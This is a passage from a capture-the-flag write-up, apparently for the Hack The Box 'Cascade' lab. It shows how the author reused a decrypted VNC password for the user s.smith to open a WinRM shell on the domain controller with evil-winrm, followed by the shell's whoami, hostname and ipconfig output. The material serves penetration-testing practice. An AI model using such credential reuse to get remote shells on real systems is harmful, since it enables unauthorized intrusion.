WinRM


I have initially discovered a WinRM service running on the target system port 5985 There was nothing to be done as I did not have any valid domain credential with such privileges.

I was able to decrypt and recover the encrypted VNC password, which turned out to belong to the s.smith user The s.smith user is part of the Remote Management Users group as enumerated from both ldapdomaindump and bloodhound

Here, I will attempt to gain an initial foothold to the DC host via WinRM

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ evil-winrm -i casc-dc1.cascade.local -u s.smith -p 'sT333ve2'           
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\s.smith\Documents> whoami
cascade\s.smith
*evil-winrm* ps c:\Users\s.smith\Documents> hostname
CASC-DC1
*evil-winrm* ps c:\Users\s.smith\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 4:
 
   connection-specific dns suffix  . :
   ipv6 address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
   link-local ipv6 address . . . . . : fe80::e8dc:7157:1983:a2bd%15
   ipv4 address. . . . . . . . . . . : 10.10.10.182
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
                                       10.10.10.2
 
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Initial Foothold established to the target system as the s.smith user via WinRM